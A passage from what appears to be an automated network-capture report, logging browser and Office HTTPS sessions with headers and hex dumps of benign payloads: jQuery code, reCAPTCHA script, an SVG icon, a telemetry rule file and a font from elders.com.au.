                                                                                                                                    Data Ascii: \\f]*\\)|)(?=[^-]|$)","i")},z=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,V=/[+~]/,Y=new RegExp("\\\\[\\da-fA-F]{1,6}[\\x20\\t\\r\\n\\f]?|\\\\([^\\r\\n\\f])","g"),G=function(e,t){var n="0x"+e.slice(1)-65536;return
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 29 75 5b 69 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 64 65 28 75 5b 69 5d 29 3b 66 3d 75 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 6d 2e 61 70 70 6c 79 28 6e 2c 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 66 29 29 2c 6e 7d 63 61 74 63 68 28 74 29 7b 45 28 65 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 76 26 26 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 79 65 28 65 2e 72 65 70 6c 61 63 65 28 4e 2c 22 24 31 22 29 2c 74 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 72 2b 22 20
                                                                                                                                    Data Ascii: )u[i]=(s?"#"+s:":scope")+" "+de(u[i]);f=u.join(",")}try{return m.apply(n,h.querySelectorAll(f)),n}catch(t){E(e,!0)}finally{s===v&&t.removeAttribute("id")}}}return ye(e.replace(N,"$1"),t,n,r)}function ee(){var e=[];return function n(r,o){return e.push(r+"
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 67 65 74 42 79 49 64 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 43 2e 65 78 70 61 6e 64 6f 2c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 43 2e 65 78 70 61 6e 64 6f 29 2e 6c 65 6e 67 74 68 7d 29 29 2c 67 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 29 2c 67 2e 73 63 6f 70 65 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 29 2c 67 2e 63 73 73 48 61 73
                                                                                                                                    Data Ascii: getById=ne((function(e){return c.appendChild(e).id=C.expando,!l.getElementsByName||!l.getElementsByName(C.expando).length})),g.disconnectedMatch=ne((function(e){return h.call(e,"*")})),g.scope=ne((function(){return l.querySelectorAll(":scope")})),g.cssHas
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 5c 5c 5b 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 53 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 76 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 76 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22
                                                                                                                                    Data Ascii: ySelectorAll("[selected]").length||p.push("\\[[\\x20\\t\\r\\n\\f]*(?:value|"+S+")"),e.querySelectorAll("[id~="+v+"-]").length||p.push("~="),e.querySelectorAll("a#"+v+"+*").length||p.push(".#.+[+~]"),e.querySelectorAll(":checked").length||p.push(":checked"
                                                                                                                                    2024-11-05 08:03:20 UTC1369INData Raw: 6e 67 74 68 3e 30 7d 2c 5a 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 2c 43 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 74 29 7d 2c 5a 2e 61 74 74 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 3b 76 61 72 20 72 3d 74 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 6f 3d 72 26 26 66 2e 63 61 6c 6c 28 74 2e 61 74 74 72 48 61 6e 64 6c 65 2c 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 72 28 65 2c 6e 2c 21 64 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 65
                                                                                                                                    Data Ascii: ngth>0},Z.contains=function(e,t){return(e.ownerDocument||e)!=l&&le(e),C.contains(e,t)},Z.attr=function(e,n){(e.ownerDocument||e)!=l&&le(e);var r=t.attrHandle[n.toLowerCase()],o=r&&f.call(t.attrHandle,n.toLowerCase())?r(e,n,!d):void 0;return void 0!==o?o:e


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    71192.168.2.449838162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC457OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:20 UTC585INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"304-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 651
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210159-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730793149.835042,VS0,VS0,VE682
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53a50afce95a-DFW
                                                                                                                                    2024-11-05 08:03:20 UTC779INData Raw: 33 30 34 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 31 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 30 30 30 37 20 31 39 2e 39 39 39 38 4c 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 4d 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 43 31 32 2e 37 30 39 34 20 31 32 2e 34 39 34 32 20 31 33 2e 31 39 36 39 20 31 31 2e 37 37 37 33 20 31 33 2e 35 33 30 39 20 31 30 2e 39 38 36 33 43 31 33 2e 38 36 34 39 20 31 30 2e 31 39 35 33 20 31 34 2e 30 33 39 20 39 2e 33 34 36 20 31 34 2e 30 34 32 39 20 38 2e 34 38 37 33 39 43 31 34 2e
                                                                                                                                    Data Ascii: 304<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.
                                                                                                                                    2024-11-05 08:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    72192.168.2.449834216.58.212.1644435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC499OUTGET /recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF HTTP/1.1
                                                                                                                                    Host: www.google.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:20 UTC749INHTTP/1.1 200 OK
                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                    Expires: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Cache-Control: private, max-age=300
                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                    Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                    Server: ESF
                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Accept-Ranges: none
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Connection: close
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    2024-11-05 08:03:20 UTC629INData Raw: 35 62 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                    Data Ascii: 5bc/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                    2024-11-05 08:03:20 UTC846INData Raw: 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f
                                                                                                                                    Data Ascii: V+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.coo
                                                                                                                                    2024-11-05 08:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    73192.168.2.44984013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:20 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:20 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 425
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                    x-ms-request-id: 7b7195f4-601e-0050-1f60-2e2c9c000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080320Z-157b9fd754fpwmfshC1SN1nanw0000000440000000005wre
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    74192.168.2.449854162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC761OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: font/ttf
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"361cc-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 40188
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210150-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730199368.746673,VS0,VS0,VE339
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2c2c486b-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC785INData Raw: 37 64 35 36 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 c9 44 1d 00 03 61 b0 00 00 00 1c 47 44 45 46 29 db 2d d3 00 02 21 0c 00 00 00 66 47 50 4f 53 c5 67 c5 a7 00 02 42 e0 00 01 1e ce 47 53 55 42 e4 7c ef 3e 00 02 21 74 00 00 21 6c 4f 53 2f 32 8c 53 71 09 00 00 01 78 00 00 00 60 63 6d 61 70 17 c0 cb 1b 00 00 14 94 00 00 05 1e 67 61 73 70 ff ff 00 03 00 02 21 04 00 00 00 08 67 6c 79 66 29 77 a7 fd 00 00 23 14 00 01 b1 94 68 65 61 64 0f d2 4a 09 00 00 00 fc 00 00 00 36 68 68 65 61 07 a7 07 6a 00 00 01 34 00 00 00 24 68 6d 74 78 18 75 d7 99 00 00 01 d8 00 00 12 bc 6c 6f 63 61 75 31 e2 e0 00 00 19 b4 00 00 09 60 6d 61 78 70 04 fd 00 8a 00 00 01 58 00 00 00 20 6e 61 6d 65 19 68 00 94 00 01 d4 a8 00 00 20 3d 70 6f 73 74 08 48 f1 dd 00 01 f4 e8 00
                                                                                                                                    Data Ascii: 7d56pFFTMDaGDEF)-!fGPOSgBGSUB|>!t!lOS/2Sqx`cmapgasp!glyf)w#headJ6hheaj4$hmtxulocau1`maxpX nameh =postH
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 4b 01 19 00 45 01 19 00 11 02 09 00 4a 01 1a 00 4b 03 28 00 43 02 2c 00 42 02 23 00 32 02 35 00 4b 02 35 00 37 01 5e 00 43 01 e4 00 28 01 55 00 1d 02 28 00 50 01 e3 00 0a 02 c4 00 0f 01 e7 ff fb 01 ed 00 0a 01 d5 00 28 01 66 00 19 01 0e 00 55 01 66 00 19 02 36 00 37 00 e1 00 00 01 27 00 4b 01 d7 00 37 02 50 00 2d 01 c9 00 2e 02 38 00 05 01 0e 00 55 02 32 00 2d 01 c6 00 37 03 52 00 37 01 a6 00 28 02 05 00 23 02 17 00 37 01 49 00 37 03 52 00 37 01 63 00 1e 01 93 00 23 02 05 00 37 01 80 00 2d 01 7d 00 2d 01 44 00 23 02 27 00 50 02 5f 00 23 01 1e 00 41 01 28 00 37 01 50 00 2d 01 a5 00 28 02 06 00 23 03 de 00 2d 03 d3 00 2d 04 0b 00 2d 01 d7 00 41 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 02 4b 00 03 03 55 ff f1 02 41 00 37 01 fd 00 55 01 fd
                                                                                                                                    Data Ascii: KEJK(C,B#25K57^C(U(P(fUf67'K7P-.8U2-7R7(#7I7R7c#7-}-D#'P_#A(7P-(#---AKKKKKKUA7U
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 02 20 00 50 02 3a 00 37 02 46 00 52 01 f1 ff fe 02 20 00 31 01 fe 00 36 01 d3 00 37 02 2c 00 42 02 2d 00 3a 01 18 00 4b 02 02 00 4b 01 f8 00 11 02 27 00 50 01 e3 00 0a 01 eb 00 36 02 23 00 32 02 31 00 23 02 16 00 39 01 d2 00 37 02 2d 00 32 01 9e 00 0f 02 20 00 50 02 b0 00 31 01 e7 ff fb 02 a7 00 45 02 b5 00 31 01 18 ff ec 02 20 00 50 02 23 00 32 02 20 00 55 02 b5 00 36 02 46 00 45 02 38 00 32 01 f4 ff f1 01 f4 ff 18 01 f4 ff f1 02 ab 00 31 01 fd 00 55 01 fd 00 55 02 9d ff fb 01 ad 00 54 02 59 00 37 02 55 00 32 01 20 00 55 01 20 ff e4 01 25 ff fc 03 8f ff fb 03 af 00 55 02 97 ff fb 02 6c 00 55 02 8f 00 55 02 11 ff fb 02 71 00 55 02 4b 00 03 02 61 00 55 02 63 00 55 01 ad 00 54 02 86 00 0a 01 fd 00 55 03 85 00 14 02 32 00 23 02 8f 00 55 02 8f 00 55 02 6c 00
                                                                                                                                    Data Ascii: P:7FR 167,B-:KK'P6#21#97-2 P1E1 P#2 U6FE821UUTY7U2 U %UlUUqUKaUcUTU2#UUl
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 38 00 32 01 d7 00 37 02 50 00 2d 01 c9 00 2e 02 38 00 05 02 7d 00 2d 02 4d 00 2b 01 e4 00 14 02 35 00 06 02 6e 00 3d 02 3a 00 36 02 3a 00 70 02 3a 00 40 02 3a 00 3f 02 3a 00 2f 02 3a 00 55 02 3a 00 34 02 3a 00 42 02 3a 00 29 02 3a 00 36 02 6e 00 78 02 6e 00 44 02 6e 00 85 02 6e 00 20 02 3a 00 00 02 6e 00 20 02 6e 00 3b 02 3a 00 2d 02 3a 00 12 03 8c 00 5f 04 be 00 5f 02 da 00 5f 03 e8 00 32 02 0a 00 03 02 42 00 5f 02 15 00 41 02 53 00 5f 01 ed 00 5f 01 c6 00 5f 02 65 00 41 02 5b 00 5f 01 32 00 5f 01 2f 00 0a 02 35 00 5f 01 b1 00 5f 03 03 00 4b 02 5d 00 5f 02 83 00 41 02 19 00 5f 02 83 00 41 02 25 00 5f 02 28 00 32 01 ca 00 14 02 5f 00 5a 01 fd ff fb 02 df 00 0a 01 f1 ff fb 01 d6 ff f1 02 00 00 37 03 03 00 4b 04 50 00 32 02 0a 00 03 02 0a 00 03 02 0a 00 03
                                                                                                                                    Data Ascii: 827P-.8}-M+5n=:6:p:@:?:/:U:4:B:):6nxnDnn :n n;:-:___2B_AS___eA[_2_/5__K]_A_A%_(2_Z7KP2
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 00 5d 03 e6 00 5d 03 e6 00 5d 01 f4 ff 18 01 f4 ff f1 01 f4 ff f1 02 46 00 45 02 38 00 32 02 ab 00 31 01 f4 ff f1 01 c8 ff fb 01 c8 ff fb 01 c8 ff fb 01 c8 ff fb 02 d7 00 0f 04 09 00 14 05 0f 00 14 03 fe 00 37 04 05 00 37 03 d0 00 37 02 e1 00 37 03 34 00 37 00 e1 ff e8 00 01 ff f0 00 01 ff f7 00 01 00 3d 00 01 fe 93 00 01 fe 72 00 01 ff 66 01 24 00 42 01 24 00 44 02 3a 00 7c 02 62 00 a2 02 8f 00 ac 01 24 00 42 03 66 00 26 02 59 00 26 03 69 00 26 03 7a 00 26 03 64 00 26 03 b0 00 26 03 6d 00 26 02 44 00 26 02 4d 00 26 03 38 00 26 02 83 00 26 03 60 00 26 03 34 00 26 04 15 00 26 03 3e 00 26 03 44 00 4b 02 23 00 70 02 23 00 63 01 63 00 1e 02 23 00 a1 02 23 00 61 01 d5 00 32 01 8c 00 17 00 d8 00 23 02 0d 00 9f 02 23 00 5c 01 cf 00 23 02 23 00 63 03 8a 00 37 04
                                                                                                                                    Data Ascii: ]]]FE821777747=rf$B$D:|b$Bf&Y&i&z&d&&m&D&M&8&&`&4&&>&DK#p#cc##a2##\##c7
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00 6c 02 86 00 77 00 6b 02 ab 00 89 00 9b 02 a8 00 74 02 ac 02 ad 00 68 00 78 02 a1 02 a4 02 a3 01 b3 02 a9 00 6d 00 7d 01 9c 00 a9 00 bb 00 82 00 64 00 6f 02 a7 01 44 02 aa 02 a2 00 6e 00 7e 02 6a 00 63 00 83 00 86 00 98 01 15 01 16 02 5e 02 5f 02 64 02 65 02 61 02 62 00 ba 02 b5 00 c2 01 3b 02 6e 02 80 02 6c 02 6d
